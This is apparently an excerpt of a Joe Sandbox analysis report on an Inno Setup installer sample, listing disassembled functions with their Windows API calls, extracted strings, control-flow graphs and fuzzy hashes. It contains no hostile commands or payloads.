                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                            • Instruction ID: 445fb77b721d6e8bc33303137c5d79e403f1e24c04085a252f4bbff9531eb306
                                                                            • Opcode Fuzzy Hash: cd9d261bbe345dbfbc1978f69ea3c80f8509ceaa1a51dcff4dfe5a18c54a8916
                                                                            • Instruction Fuzzy Hash: 6AD0C271304704A3C700AAA99C825AA35DD8B84315F00483F3CC6DA3C3FABDDA481696
                                                                            APIs
                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F54C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: NtdllProc_Window
                                                                            • String ID:
                                                                            • API String ID: 4255912815-0
                                                                            • Opcode ID: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                            • Instruction ID: 55aff4e3ab0814f5b97a0c0db1ec4da333d3f7c11773d115dc143ade784a7ab4
                                                                            • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                            • Instruction Fuzzy Hash: BAD05E7120010C7B9B00DE9CE840C6B33BC9B88700BA08825F918C7202C634ED5187A8

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 406 46f300-46f332 407 46f334-46f33b 406->407 408 46f34f 406->408 409 46f346-46f34d 407->409 410 46f33d-46f344 407->410 411 46f356-46f38e call 403634 call 403738 call 42ded0 408->411 409->411 410->408 410->409 418 46f390-46f3a4 call 403738 call 42ded0 411->418 419 46f3a9-46f3d2 call 403738 call 42ddf4 411->419 418->419 427 46f3d4-46f3dd call 46efd0 419->427 428 46f3e2-46f40b call 46f0ec 419->428 427->428 432 46f41d-46f420 call 403400 428->432 433 46f40d-46f41b call 403494 428->433 437 46f425-46f470 call 46f0ec call 42c40c call 46f134 call 46f0ec 432->437 433->437 446 46f486-46f4a7 call 455588 call 46f0ec 437->446 447 46f472-46f485 call 46f15c 437->447 454 46f4fd-46f504 446->454 455 46f4a9-46f4fc call 46f0ec call 431414 call 46f0ec call 431414 call 46f0ec 446->455 447->446 456 46f506-46f543 call 431414 call 46f0ec call 431414 call 46f0ec 454->456 457 46f544-46f54b 454->457 455->454 456->457 460 46f58c-46f5b1 call 40b44c call 46f0ec 457->460 461 46f54d-46f58b call 46f0ec * 3 457->461 479 46f5b3-46f5be call 47bfd8 460->479 480 46f5c0-46f5c9 call 403494 460->480 461->460 491 46f5ce-46f5d9 call 478d20 479->491 480->491 496 46f5e2 491->496 497 46f5db-46f5e0 491->497 498 46f5e7-46f7b1 call 403778 call 46f0ec call 47bfd8 call 46f134 call 403494 call 40357c * 2 call 46f0ec call 403494 call 40357c * 2 call 46f0ec call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 call 46f134 call 47bfd8 496->498 497->498 561 46f7c7-46f7d5 call 46f15c 498->561 562 46f7b3-46f7c5 call 46f0ec 498->562 566 46f7da 561->566 567 46f7db-46f824 call 46f15c call 46f190 call 46f0ec call 47bfd8 call 46f1f4 562->567 566->567 578 46f826-46f849 call 46f15c * 2 567->578 579 46f84a-46f857 567->579 578->579 580 46f926-46f92d 579->580 581 46f85d-46f864 579->581 585 46f987-46f99d RegCloseKey 580->585 586 46f92f-46f965 call 4946bc 580->586 583 46f866-46f86d 581->583 584 46f8d1-46f8e0 581->584 583->584 589 46f86f-46f893 call 430bdc 583->589 588 46f8e3-46f8f0 584->588 586->585 592 46f907-46f920 call 430c18 call 46f15c 588->592 593 46f8f2-46f8ff 588->593 589->588 601 46f895-46f896 589->601 604 46f925 592->604 593->592 597 46f901-46f905 593->597 597->580 597->592 603 46f898-46f8be call 40b44c call 47954c 601->603 609 46f8c0-46f8c6 call 430bdc 603->609 610 46f8cb-46f8cd 603->610 604->580 609->610 610->603 612 46f8cf 610->612 612->588
                                                                            APIs
                                                                              • Part of subcall function 0046F0EC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                              • Part of subcall function 0046F15C: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                            • RegCloseKey.ADVAPI32(?,0046F9A5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F9F0,?,?,0049C1D0,00000000), ref: 0046F998
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Value$Close
                                                                            • String ID: " /SILENT$5.5.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                            • API String ID: 3391052094-1769338133
                                                                            • Opcode ID: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                            • Instruction ID: 138fe2a8aa43a8f2517aa1aee13eacc10811dc4b0cf032f1bf39601b5d09dcc5
                                                                            • Opcode Fuzzy Hash: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                            • Instruction Fuzzy Hash: 96126331A001089BCB04EB55F891ADE77F5FB49304F60807BE841AB396EB79BD49CB59

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1027 492208-49223c call 403684 1030 49223e-49224d call 446fac Sleep 1027->1030 1031 492252-49225f call 403684 1027->1031 1036 4926e2-4926fc call 403420 1030->1036 1037 49228e-49229b call 403684 1031->1037 1038 492261-492284 call 447008 call 403738 FindWindowA call 447288 1031->1038 1046 4922ca-4922d7 call 403684 1037->1046 1047 49229d-4922c5 call 447008 call 403738 FindWindowA call 447288 1037->1047 1056 492289 1038->1056 1054 4922d9-49231b call 446fac * 4 SendMessageA call 447288 1046->1054 1055 492320-49232d call 403684 1046->1055 1047->1036 1054->1036 1064 49237c-492389 call 403684 1055->1064 1065 49232f-492377 call 446fac * 4 PostMessageA call 4470e0 1055->1065 1056->1036 1076 4923d8-4923e5 call 403684 1064->1076 1077 49238b-4923d3 call 446fac * 4 SendNotifyMessageA call 4470e0 1064->1077 1065->1036 1089 492412-49241f call 403684 1076->1089 1090 4923e7-49240d call 447008 call 403738 RegisterClipboardFormatA call 447288 1076->1090 1077->1036 1102 492421-49245b call 446fac * 3 SendMessageA call 447288 1089->1102 1103 492460-49246d call 403684 1089->1103 1090->1036 1102->1036 1115 49246f-4924af call 446fac * 3 PostMessageA call 4470e0 1103->1115 1116 4924b4-4924c1 call 403684 1103->1116 1115->1036 1128 492508-492515 call 403684 1116->1128 1129 4924c3-492503 call 446fac * 3 SendNotifyMessageA call 4470e0 1116->1129 1140 49256a-492577 call 403684 1128->1140 1141 492517-492535 call 447008 call 42e3a4 1128->1141 1129->1036 1151 492579-4925a5 call 447008 call 403738 call 446fac GetProcAddress 1140->1151 1152 4925f1-4925fe call 403684 1140->1152 1158 492547-492555 GetLastError call 447288 1141->1158 1159 492537-492545 call 447288 1141->1159 1183 4925e1-4925ec call 4470e0 1151->1183 1184 4925a7-4925dc call 446fac * 2 call 447288 call 4470e0 1151->1184 1164 492600-492621 call 446fac FreeLibrary call 4470e0 1152->1164 1165 492626-492633 call 403684 1152->1165 1170 49255a-492565 call 447288 1158->1170 1159->1170 1164->1036 1180 492658-492665 call 403684 1165->1180 1181 492635-492653 call 447008 call 403738 CreateMutexA 1165->1181 1170->1036 1191 49269b-4926a8 call 403684 1180->1191 1192 492667-492699 call 48c638 call 403574 call 403738 OemToCharBuffA call 48c650 1180->1192 1181->1036 1183->1036 1184->1036 1204 4926aa-4926dc call 48c638 call 403574 call 403738 CharToOemBuffA call 48c650 1191->1204 1205 4926de 1191->1205 1192->1036 1204->1036 1205->1036
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                                            • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FindSleepWindow
                                                                            • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                            • API String ID: 3078808852-3310373309
                                                                            • Opcode ID: c1ec15085ba63eb54c7011cdac0519612329d97296155b19e28ce0d5a23e6700
                                                                            • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                                            • Opcode Fuzzy Hash: c1ec15085ba63eb54c7011cdac0519612329d97296155b19e28ce0d5a23e6700
                                                                            • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1589 4834fc-483521 GetModuleHandleA GetProcAddress 1590 483588-48358d GetSystemInfo 1589->1590 1591 483523-483539 GetNativeSystemInfo GetProcAddress 1589->1591 1592 483592-48359b 1590->1592 1591->1592 1593 48353b-483546 GetCurrentProcess 1591->1593 1594 4835ab-4835b2 1592->1594 1595 48359d-4835a1 1592->1595 1593->1592 1602 483548-48354c 1593->1602 1598 4835cd-4835d2 1594->1598 1596 4835a3-4835a7 1595->1596 1597 4835b4-4835bb 1595->1597 1600 4835a9-4835c6 1596->1600 1601 4835bd-4835c4 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1604 48354e-483555 call 452708 1602->1604 1604->1592 1607 483557-483564 GetProcAddress 1604->1607 1607->1592 1608 483566-48357d GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 48357f-483586 1608->1609 1609->1592
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                                            • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                                            • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                            • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                            • API String ID: 2230631259-2623177817
                                                                            • Opcode ID: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                            • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                                            • Opcode Fuzzy Hash: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                            • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1615 4690f4-46912c call 47bfd8 1618 469132-469142 call 478d40 1615->1618 1619 46930e-469328 call 403420 1615->1619 1624 469147-46918c call 4078fc call 403738 call 42de2c 1618->1624 1630 469191-469193 1624->1630 1631 469304-469308 1630->1631 1632 469199-4691ae 1630->1632 1631->1619 1631->1624 1633 4691c3-4691ca 1632->1633 1634 4691b0-4691be call 42dd5c 1632->1634 1635 4691f7-4691fe 1633->1635 1636 4691cc-4691ee call 42dd5c call 42dd74 1633->1636 1634->1633 1639 469257-46925e 1635->1639 1640 469200-469225 call 42dd5c * 2 1635->1640 1636->1635 1655 4691f0 1636->1655 1642 4692a4-4692ab 1639->1642 1643 469260-469272 call 42dd5c 1639->1643 1662 469227-469230 call 431508 1640->1662 1663 469235-469247 call 42dd5c 1640->1663 1648 4692e6-4692fc RegCloseKey 1642->1648 1649 4692ad-4692e1 call 42dd5c * 3 1642->1649 1656 469274-46927d call 431508 1643->1656 1657 469282-469294 call 42dd5c 1643->1657 1649->1648 1655->1635 1656->1657 1657->1642 1670 469296-46929f call 431508 1657->1670 1662->1663 1663->1639 1671 469249-469252 call 431508 1663->1671 1670->1642 1671->1639
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                                            Strings
                                                                            • Inno Setup: User Info: Name, xrefs: 004692B3
                                                                            • Inno Setup: App Path, xrefs: 004691B6
                                                                            • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                                            • Inno Setup: Deselected Components, xrefs: 00469238
                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                                            • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                                            • %s\%s_is1, xrefs: 00469171
                                                                            • Inno Setup: Selected Tasks, xrefs: 00469263
                                                                            • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                                            • Inno Setup: No Icons, xrefs: 004691DF
                                                                            • Inno Setup: Icon Group, xrefs: 004691D2
                                                                            • Inno Setup: Setup Type, xrefs: 00469206
                                                                            • Inno Setup: Selected Components, xrefs: 00469216
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                            • API String ID: 47109696-1093091907
                                                                            • Opcode ID: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                            • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                                            • Opcode Fuzzy Hash: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                            • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1944 47cb30-47cb86 call 42c40c call 4035c0 call 47c7a8 call 4525c4 1953 47cb92-47cba1 call 4525c4 1944->1953 1954 47cb88-47cb8d call 453330 1944->1954 1958 47cba3-47cba9 1953->1958 1959 47cbbb-47cbc1 1953->1959 1954->1953 1960 47cbcb-47cbd3 call 403494 1958->1960 1961 47cbab-47cbb1 1958->1961 1962 47cbc3-47cbc9 1959->1962 1963 47cbd8-47cc00 call 42e3a4 * 2 1959->1963 1960->1963 1961->1959 1965 47cbb3-47cbb9 1961->1965 1962->1960 1962->1963 1970 47cc27-47cc41 GetProcAddress 1963->1970 1971 47cc02-47cc22 call 4078fc call 453330 1963->1971 1965->1959 1965->1960 1973 47cc43-47cc48 call 453330 1970->1973 1974 47cc4d-47cc6a call 403400 * 2 1970->1974 1971->1970 1973->1974
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(74DF0000,SHGetFolderPathA), ref: 0047CC32
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                            • API String ID: 190572456-1821436788
                                                                            • Opcode ID: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                            • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                                            • Opcode Fuzzy Hash: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                            • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1982 406334-40634e GetModuleHandleA GetProcAddress 1983 406350 1982->1983 1984 406357-406364 GetProcAddress 1982->1984 1983->1984 1985 406366 1984->1985 1986 40636d-40637a GetProcAddress 1984->1986 1985->1986 1987 406380-406381 1986->1987 1988 40637c-40637e SetProcessDEPPolicy 1986->1988 1988->1987
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                            • API String ID: 3256987805-3653653586
                                                                            • Opcode ID: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                                            • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                            • Opcode Fuzzy Hash: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                                            • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2618 423884-42388e 2619 4239b7-4239bb 2618->2619 2620 423894-4238b6 call 41f3d4 GetClassInfoA 2618->2620 2623 4238e7-4238f0 GetSystemMetrics 2620->2623 2624 4238b8-4238cf RegisterClassA 2620->2624 2626 4238f2 2623->2626 2627 4238f5-4238ff GetSystemMetrics 2623->2627 2624->2623 2625 4238d1-4238e2 call 408cc4 call 40311c 2624->2625 2625->2623 2626->2627 2628 423901 2627->2628 2629 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2627->2629 2628->2629 2641 423962-423975 call 424188 SendMessageA 2629->2641 2642 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2629->2642 2641->2642 2642->2619 2644 4239aa-4239b2 DeleteMenu 2642->2644 2644->2619
                                                                            APIs
                                                                              • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                            • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                            • RegisterClassA.USER32(00499630), ref: 004238C7
                                                                            • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                            • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                            • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                            • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                            • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                            • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                            • String ID:
                                                                            • API String ID: 183575631-0
                                                                            • Opcode ID: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
